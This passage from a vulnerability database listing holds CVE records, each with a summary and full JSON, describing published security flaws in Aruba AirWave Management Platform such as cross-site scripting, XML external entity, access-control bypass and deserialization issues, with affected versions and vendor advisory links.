        "dateUpdated": "2021-08-26T19:40:48",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-015.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-37715",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.13.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote cross-site scripting (XSS) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.13.0. Aruba has released upgrades for the Aruba AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote cross-site scripting (xss)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-015.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-015.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-37715",
    "datePublished": "2021-08-26T19:40:48",
    "dateReserved": "2021-07-29T00:00:00",
    "dateUpdated": "2024-08-04T01:23:01.561Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26964
Vulnerability from cvelistv5
Published
2021-03-05 16:06
Modified
2024-08-03 20:33
Severity ?
Summary
A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an authenticated remote attacker to improperly access and modify devices and management user details. A successful exploit would consist of an attacker using a lower privileged account to change management user or device details. This could allow the attacker to escalate privileges and/or change network details that they should not have access to.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.378Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an authenticated remote attacker to improperly access and modify devices and management user details. A successful exploit would consist of an attacker using a lower privileged account to change management user or device details. This could allow the attacker to escalate privileges and/or change network details that they should not have access to."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authentication restriction bypass",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:06:09",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26964",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an authenticated remote attacker to improperly access and modify devices and management user details. A successful exploit would consist of an attacker using a lower privileged account to change management user or device details. This could allow the attacker to escalate privileges and/or change network details that they should not have access to."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authentication restriction bypass"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26964",
    "datePublished": "2021-03-05T16:06:09",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.378Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2015-2201
Vulnerability from cvelistv5
Published
2023-09-05 00:00
Modified
2024-09-30 17:42
Severity ?
Summary
Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows VisualRF remote OS command execution and file disclosure by administrative users.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T05:10:15.469Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2015-2201",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-30T17:42:31.444239Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-30T17:42:40.697Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows VisualRF remote OS command execution and file disclosure by administrative users."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-05T17:45:13.412521",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-2201",
    "datePublished": "2023-09-05T00:00:00",
    "dateReserved": "2015-03-03T00:00:00",
    "dateUpdated": "2024-09-30T17:42:40.697Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-37916
Vulnerability from cvelistv5
Published
2022-12-08 00:00
Modified
2024-08-03 10:37
Severity ?
Summary
Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: 8.2.15.0 and below
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:37:42.534Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "8.2.15.0 and below"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Colton Bachman of Aruba Threat Labs"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eVulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\u003c/p\u003e"
            }
          ],
          "value": "Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\n\n"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Broken Access Control",
              "lang": "en"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-28T18:42:35.499Z",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Broken Access Control for some Web-based Management URLs in AirWave Management Platform",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2022-37916",
    "datePublished": "2022-12-08T00:00:00",
    "dateReserved": "2022-08-08T00:00:00",
    "dateUpdated": "2024-08-03T10:37:42.534Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-37918
Vulnerability from cvelistv5
Published
2022-12-08 00:00
Modified
2024-08-03 10:37
Severity ?
Summary
Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: 8.2.15.0 and below
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:37:42.551Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "8.2.15.0 and below"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "  oussama sadouki"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eVulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\u003c/p\u003e"
            }
          ],
          "value": "Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\n\n"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Broken Access Control",
              "lang": "en"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-28T18:41:34.086Z",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Broken Access Control for some Web-based Management URLs in AirWave Management Platform",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2022-37918",
    "datePublished": "2022-12-08T00:00:00",
    "dateReserved": "2022-08-08T00:00:00",
    "dateUpdated": "2024-08-03T10:37:42.551Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26969
Vulnerability from cvelistv5
Published
2021-03-05 16:41
Modified
2024-08-03 20:40
Severity ?
Summary
A remote authenticated authenticated xml external entity (xxe) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Due to improper restrictions on XML entities a vulnerability exists in the web-based management interface of AirWave. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:40:45.779Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated authenticated xml external entity (xxe) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Due to improper restrictions on XML entities a vulnerability exists in the web-based management interface of AirWave. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated authenticated xml external entity (xxe)",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:41:32",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26969",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated authenticated xml external entity (xxe) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Due to improper restrictions on XML entities a vulnerability exists in the web-based management interface of AirWave. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated authenticated xml external entity (xxe)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26969",
    "datePublished": "2021-03-05T16:41:32",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:40:45.779Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25163
Vulnerability from cvelistv5
Published
2021-04-29 10:45
Modified
2024-08-03 19:56
Severity ?
Summary
A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.553Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote xml external entity",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-29T10:45:38",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25163",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote xml external entity"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25163",
    "datePublished": "2021-04-29T10:45:38",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.553Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25152
Vulnerability from cvelistv5
Published
2021-04-28 19:18
Modified
2024-08-03 19:56
Severity ?
Summary
A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.619Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote insecure deserialization",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T19:18:51",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25152",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote insecure deserialization"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25152",
    "datePublished": "2021-04-28T19:18:51",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.619Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26968
Vulnerability from cvelistv5
Published
2021-03-05 16:35
Modified
2024-08-03 20:40
Severity ?
Summary
A remote authenticated stored cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:40:45.794Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated stored cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the affected interface."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated stored cross-site scripting (xss)",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:35:26",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26968",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated stored cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the affected interface."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated stored cross-site scripting (xss)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26968",
    "datePublished": "2021-03-05T16:35:26",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:40:45.794Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25166
Vulnerability from cvelistv5
Published
2021-04-29 10:52
Modified
2024-08-03 19:56
Severity ?
Summary
A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.643Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
